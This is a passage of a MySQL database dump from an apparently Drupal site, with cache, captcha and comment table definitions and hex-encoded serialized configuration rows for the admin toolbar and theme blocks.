-- --------------------------------------------------------

--
-- Table structure for table `cache_data`
--

CREATE TABLE `cache_data` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_default`
--

CREATE TABLE `cache_default` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_discovery`
--

CREATE TABLE `cache_discovery` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_dynamic_page_cache`
--

CREATE TABLE `cache_dynamic_page_cache` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_entity`
--

CREATE TABLE `cache_entity` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_menu`
--

CREATE TABLE `cache_menu` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_page`
--

CREATE TABLE `cache_page` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_render`
--

CREATE TABLE `cache_render` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `cache_toolbar`
--

CREATE TABLE `cache_toolbar` (
  `cid` varchar(255) CHARACTER SET ascii COLLATE ascii_bin NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.',
  `data` longblob COMMENT 'A collection of data to cache.',
  `expire` bigint NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or -1 for never.',
  `created` decimal(14,3) NOT NULL DEFAULT '0.000' COMMENT 'A timestamp with millisecond precision indicating when the cache entry was created.',
  `serialized` smallint NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).',
  `tags` longtext COMMENT 'Space-separated list of cache tags for this entry.',
  `checksum` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The tag invalidation checksum when this entry was saved.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Storage for the cache API.';

-- --------------------------------------------------------

--
-- Table structure for table `captcha_sessions`
--

CREATE TABLE `captcha_sessions` (
  `csid` int NOT NULL COMMENT 'CAPTCHA session ID.',
  `token` varchar(64) DEFAULT NULL COMMENT 'One time CAPTCHA token.',
  `uid` int NOT NULL DEFAULT '0' COMMENT 'User''s "users".uid.',
  `sid` varchar(64) NOT NULL DEFAULT '' COMMENT 'Session ID of the user.',
  `ip_address` varchar(128) DEFAULT NULL COMMENT 'IP address of the visitor.',
  `timestamp` int NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the challenge was generated.',
  `form_id` varchar(128) NOT NULL COMMENT 'The form_id of the form where the CAPTCHA is added to.',
  `solution` varchar(128) NOT NULL DEFAULT '' COMMENT 'Solution of the challenge.',
  `status` int NOT NULL DEFAULT '0' COMMENT 'Status of the CAPTCHA session (unsolved, solved, ...)',
  `attempts` int NOT NULL DEFAULT '0' COMMENT 'The number of attempts.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores the data about CAPTCHA sessions (solution, IP…';

--
-- Dumping data for table `captcha_sessions`
--

INSERT INTO `captcha_sessions` (`csid`, `token`, `uid`, `sid`, `ip_address`, `timestamp`, `form_id`, `solution`, `status`, `attempts`) VALUES
(15607, NULL, 0, '', '::1', 1787790016, 'user_login_form', '5', 1, 1),
(15608, NULL, 0, '', '::1', 1787836337, 'user_login_form', '2', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `comment`
--

CREATE TABLE `comment` (
  `cid` int UNSIGNED NOT NULL,
  `comment_type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for comment entities.';

-- --------------------------------------------------------

--
-- Table structure for table `comment_entity_statistics`
--

CREATE TABLE `comment_entity_statistics` (
  `entity_id` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The entity_id of the entity for which the statistics are compiled.',
  `entity_type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT 'node' COMMENT 'The entity_type of the entity to which this comment is a reply.',
  `field_name` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field_name of the field that was used to add this comment.',
  `cid` int NOT NULL DEFAULT '0' COMMENT 'The "comment".cid of the last comment.',
  `last_comment_timestamp` bigint NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp of the last comment that was posted within this node, from "comment".changed.',
  `last_comment_name` varchar(60) DEFAULT NULL COMMENT 'The name of the latest author to post a comment on this node, from "comment".name.',
  `last_comment_uid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The user ID of the latest author to post a comment on this node, from "comment".uid.',
  `comment_count` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The total number of comments on this entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Maintains statistics of entity and comments posts to show …';

-- --------------------------------------------------------

--
-- Table structure for table `comment_field_data`
--

CREATE TABLE `comment_field_data` (
  `cid` int UNSIGNED NOT NULL,
  `comment_type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `uid` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.',
  `pid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `entity_id` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `subject` varchar(64) DEFAULT NULL,
  `name` varchar(60) DEFAULT NULL,
  `mail` varchar(254) DEFAULT NULL,
  `homepage` varchar(255) DEFAULT NULL,
  `hostname` varchar(128) DEFAULT NULL,
  `created` int NOT NULL,
  `changed` int DEFAULT NULL,
  `thread` varchar(255) NOT NULL,
  `entity_type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `field_name` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `default_langcode` tinyint NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for comment entities.';

-- --------------------------------------------------------

--
-- Table structure for table `comment__comment_body`
--

CREATE TABLE `comment__comment_body` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to, which for an unversioned entity type is the same as the entity id',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `comment_body_value` longtext NOT NULL,
  `comment_body_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for comment field comment_body.';

-- --------------------------------------------------------

--
-- Table structure for table `config`
--

CREATE TABLE `config` (
  `collection` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Primary Key: Config object collection.',
  `name` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Primary Key: Config object name.',
  `data` longblob COMMENT 'A serialized configuration object data.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for configuration data.';

--
-- Dumping data for table `config`
--

INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'admin_toolbar.settings', 0x613a343a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226a76545370707a63674835776e7a42685835786e4145786370324931437a6b515f616b793635584e665949223b7d733a31303a226d656e755f6465707468223b693a343b733a32303a22686f766572696e74656e745f6265686176696f72223b613a323a7b733a373a22656e61626c6564223b623a313b733a373a2274696d656f7574223b693a3530303b7d733a32323a22656e61626c655f746f67676c655f73686f7274637574223b623a303b7d),
('', 'admin_toolbar_search.settings', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2241416d576367777a47596258665236776645664d796f69337235515a776c707876713564486275706e4a6f223b7d733a31373a22646973706c61795f6d656e755f6974656d223b623a303b733a32343a22656e61626c655f6b6579626f6172645f73686f7274637574223b623a313b7d),
('', 'admin_toolbar_tools.settings', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225767645a7372645f3577396a6c6d6348563452396444327447394f5a456b596f34495f4f38683747713851223b7d733a31373a226d61785f62756e646c655f6e756d626572223b693a32303b733a31363a2273686f775f6c6f63616c5f7461736b73223b623a303b7d),
('', 'at_core.settings', 0x613a333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22686749584648663339665f77616868436d6233646170724e6f3166355972616863745f493274362d553834223b7d733a32303a2273686f72746375745f6d6f64756c655f6c696e6b223b623a303b733a383a2273657474696e6773223b613a313a7b733a343a2262617365223b733a343a226f6e6c79223b7d7d),
('', 'automated_cron.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2266556b73524f743446666b41553942563468563258766854425353326e544e725a53345537532d744b7273223b7d733a383a22696e74657276616c223b693a31303830303b7d),
('', 'block.block.aboutustitle', 0x613a31323a7b733a343a2275756964223b733a33363a2266656436393739622d363234392d343135342d383535642d396661396164323931373161223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a64306338303231382d363837372d343634612d613264382d633535663631353532643236223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31323a2261626f757475737469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31353b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a64306338303231382d363837372d343634612d613264382d633535663631353532643236223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a64306338303231382d363837372d343634612d613264382d633535663631353532643236223b733a353a226c6162656c223b733a31343a2241626f7574205573207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a222f6e6f64652f31223b7d7d7d),
('', 'block.block.activitiestitle', 0x613a31323a7b733a343a2275756964223b733a33363a2266663233376235662d616333382d346339352d396634662d383066633062663862336462223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a34306162636637652d393235622d346561382d623762302d323730376363623864366630223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31353a22616374697669746965737469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a34306162636637652d393235622d346561382d623762302d323730376363623864366630223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a34306162636637652d393235622d346561382d623762302d323730376363623864366630223b733a353a226c6162656c223b733a31363a2241637469766974696573207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a32363a222f616374697669746965732f2a0d0a2f61637469766974696573223b7d7d7d),
('', 'block.block.announcementtitle', 0x613a31323a7b733a343a2275756964223b733a33363a2236613639383362642d313534372d343730352d393662392d636462353961303432373237223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a39623462633565332d376635342d346137652d613435612d353362333439363332343939223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31373a22616e6e6f756e63656d656e747469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31333b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a39623462633565332d376635342d346137652d613435612d353362333439363332343939223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a39623462633565332d376635342d346137652d613435612d353362333439363332343939223b733a353a226c6162656c223b733a31383a22416e6e6f756e63656d656e74207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a33303a222f616e6e6f756e63656d656e742f2a0d0a2f616e6e6f756e63656d656e74223b7d7d7d),
('', 'block.block.claro_breadcrumbs', 0x613a31333a7b733a343a2275756964223b733a33363a2231373134323964312d386464362d346235622d613839372d366430626366353432653339223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224e6a63784f4272504f694b352d333874353644774642445659347965723759536c62525758467548653741223b7d733a323a226964223b733a31373a22636c61726f5f62726561646372756d6273223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a31303a2262726561646372756d62223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32333a2273797374656d5f62726561646372756d625f626c6f636b223b733a353a226c6162656c223b733a31313a2242726561646372756d6273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_content', 0x613a31333a7b733a343a2275756964223b733a33363a2230653331346439362d643837312d343834392d383266622d343565343462363030303864223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226130597978314765794b61725a34545f79585142525f5a464b6e5869464c747841623667574c64386e7230223b7d733a323a226964223b733a31333a22636c61726f5f636f6e74656e74223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31373a2273797374656d5f6d61696e5f626c6f636b223b733a353a226c6162656c223b733a31373a224d61696e207061676520636f6e74656e74223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_help', 0x613a31333a7b733a343a2275756964223b733a33363a2234303665363033372d633866662d346363342d383461342d653163326634343261363430223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2268656c70223b7d733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226a63634653535671563057434462364e744d4c3156574157547444625a2d7a6e35596754524d674d72494d223b7d733a323a226964223b733a31303a22636c61726f5f68656c70223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a343a2268656c70223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31303a2268656c705f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31303a2268656c705f626c6f636b223b733a353a226c6162656c223b733a343a2248656c70223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a2268656c70223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_help_search', 0x613a31313a7b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a363a226d6f64756c65223b613a323a7b693a303b733a363a22736561726368223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d733a383a22656e666f72636564223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a227365617263682e706167652e68656c705f736561726368223b7d7d7d733a323a226964223b733a31373a22636c61726f5f68656c705f736561726368223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a343a2268656c70223b733a363a22776569676874223b693a2d343b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a227365617263685f666f726d5f626c6f636b223b733a383a2273657474696e6773223b613a353a7b733a323a226964223b733a31373a227365617263685f666f726d5f626c6f636b223b733a353a226c6162656c223b733a31313a225365617263682068656c70223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a363a22736561726368223b733a373a22706167655f6964223b733a31313a2268656c705f736561726368223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a343a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a303a7b7d733a353a227061676573223b733a31313a222f61646d696e2f68656c70223b7d7d7d),
('', 'block.block.claro_local_actions', 0x613a31333a7b733a343a2275756964223b733a33363a2231366666323833622d636338312d346365322d613534302d363363383932346366633961223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2243645866446d526741766d733745516f7678785750645969304769747865526256745363594b31365a4830223b7d733a323a226964223b733a31393a22636c61726f5f6c6f63616c5f616374696f6e73223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a373a22636f6e74656e74223b733a363a22776569676874223b693a2d31303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31393a226c6f63616c5f616374696f6e735f626c6f636b223b733a353a226c6162656c223b733a32313a225072696d6172792061646d696e20616374696f6e73223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_messages', 0x613a31333a7b733a343a2275756964223b733a33363a2236656539363966392d646130382d343838632d613565652d653134626635663432626633223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a222d41633349537049543050512d77687a44375f64773053644b693664416252464e5764536a4f6956447167223b7d733a323a226964223b733a31343a22636c61726f5f6d65737361676573223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a31313a22686967686c696768746564223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32313a2273797374656d5f6d657373616765735f626c6f636b223b733a353a226c6162656c223b733a31353a22537461747573206d65737361676573223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a363a2273797374656d223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
